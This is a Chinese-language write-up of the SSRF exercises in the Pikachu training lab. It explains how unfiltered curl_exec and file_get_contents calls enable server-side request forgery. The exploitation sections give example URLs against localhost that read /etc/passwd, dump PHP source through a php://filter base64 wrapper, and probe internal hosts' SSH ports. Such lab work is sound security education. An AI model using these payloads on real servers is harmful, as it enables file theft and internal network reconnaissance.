PiKachu靶场之SSRF (服务端请求伪造)
概述
SSRF (Server-Side Request Forgery:服务器端请求伪造)
其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制
导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据
数据流: 攻击者----->服务器---->目标地址
根据后台使用的函数的不同,对应的影响和利用方法又有不一样
PHP中下面函数的使用不当会导致SSRF:
file_get_contents()
fsockopen()
curl_exec()如果一定要通过后台服务器远程去对用户指定("或者预埋在前端的请求")的地址进行资源请求,则请做好目标地址的过滤。
你可以根据"SSRF"里面的项目来搞懂问题的原因
一、SSRF之curl
- 关于php的curl
PHP支持的由Daniel Stenberg创建的libcurl库允许你与各种的服务器使用各种类型的协议进行连接和通讯。
libcurl目前支持http、https、ftp、gopher、telnet、dict、file和ldap协议。libcurl同时也支持HTTPS认证、HTTP POST、HTTP PUT、 FTP 上传(这个也能通过PHP的FTP扩展完成)、HTTP 基于表单的上传、代理、cookies和用户名+密码的认证。
PHP中使用cURL实现Get和Post请求的方法
这些函数在PHP 4.0.2中被引入
| 函数 | 描述 |
|---|---|
| curl_close() | 关闭一个cURL会话。 |
| curl_copy_handle() | 复制一个cURL句柄和它的所有选项。 |
| curl_errno() | 返回最后一次的错误号。 |
| curl_error() | 返回一个保护当前会话最近一次错误的字符串。 |
| curl_escape() | 返回转义字符串,对给定的字符串进行URL编码。 |
| curl_exec() | 执行一个cURL会话。 |
| curl_file_create() | 创建一个 CURLFile 对象。 |
| curl_getinfo() | 获取一个cURL连接资源句柄的信息。 |
| curl_init() | 初始化一个cURL会话。 |
| curl_multi_add_handle() | 向curl批处理会话中添加单独的curl句柄。 |
| curl_multi_close() | 关闭一组cURL句柄。 |
| curl_multi_exec() | 运行当前 cURL 句柄的子连接。 |
| curl_multi_getcontent() | 如果设置了CURLOPT_RETURNTRANSFER,则返回获取的输出的文本流。 |
| curl_multi_info_read() | 获取当前解析的cURL的相关传输信息。 |
| curl_multi_init() | 返回一个新cURL批处理句柄。 |
| curl_multi_remove_handle() | 移除curl批处理句柄资源中的某个句柄资源。 |
| curl_multi_select() | 等待所有cURL批处理中的活动连接。 |
| curl_multi_setopt() | 设置一个批处理cURL传输选项。 |
| curl_multi_strerror() | 返回描述错误码的字符串文本。 |
| curl_pause() | 暂停及恢复连接。 |
| curl_reset() | 重置libcurl的会话句柄的所有选项。 |
| curl_setopt_array() | 为cURL传输会话批量设置选项。 |
| curl_setopt() | 设置一个cURL传输选项。 |
| curl_share_close() | 关闭cURL共享句柄。 |
| curl_share_init() | 初始化cURL共享句柄。 |
| curl_share_setopt() | 设置一个共享句柄的cURL传输选项。 |
| curl_strerror() | 返回错误代码的字符串描述。 |
| curl_unescape() | 解码URL编码后的字符串。 |
| curl_version() | 获取cURL版本信息。 |
分析
看到有一个url参数:
再分析源码, 看到其使用了curl:
漏洞利用
既然curl支持多种协议, 这里只演示file和http/https:
- file协议
http://localhost/pikachu-master/vul/ssrf/ssrf_curl.php?url=file:///home/meta/java.log.4055
- http/https协议
将url改为内网上的其他主机, (使用http协议)
http://localhost/pikachu-master/vul/ssrf/ssrf_curl.php?url=http://192.168.10.100:22
通过这个探子, 就可以探测到内网的其他主机ssh端口是否开放
二、SSRF之file_get_content
- 关于php的file_get_content() 函数
file_get_contents() 把整个文件读入一个字符串中。
该函数是用于把文件的内容读入到一个字符串中的首选方法。如果服务器操作系统支持,还会使用内存映射技术来增强性能。
函数签名: file_get_contents(path,include_path,context,start,max_length)
| 参数 | 描述 |
|---|---|
| path | 必需。规定要读取的文件。 |
| include_path | 可选。如果您还想在 include_path(在 php.ini 中)中搜索文件的话,请设置该参数为 '1'。 |
| context | 可选。规定文件句柄的环境。context 是一套可以修改流的行为的选项。若使用 NULL,则忽略。 |
| start | 可选。规定在文件中开始读取的位置。该参数是 PHP 5.1 中新增的。 |
| max_length | 可选。规定读取的字节数。该参数是 PHP 5.1 中新增的。 |
分析
源代码中用了file_get_contents()函数来进行文件读取执行:
漏洞利用
和上一关一样,
- file协议进行文件读取:
http://localhost/pikachu-master/vul/ssrf/ssrf_fgc.php?file=file:///etc/passwd
- 读取php源码
http://localhost/pikachu-master/vul/ssrf/ssrf_fgc.php?file=php://filter/read=convert.base64-encode/resource=ssrf.php
再将其base64解密得到源码:
- 内网其他主机的请求
http://localhost/pikachu-master/vul/ssrf/ssrf_fgc.php?file=http://192.168.10.100/index.html
- 探测内网其他主机的端口
http://localhost/pikachu-master/vul/ssrf/ssrf_fgc.php?file=http://192.168.10.100:22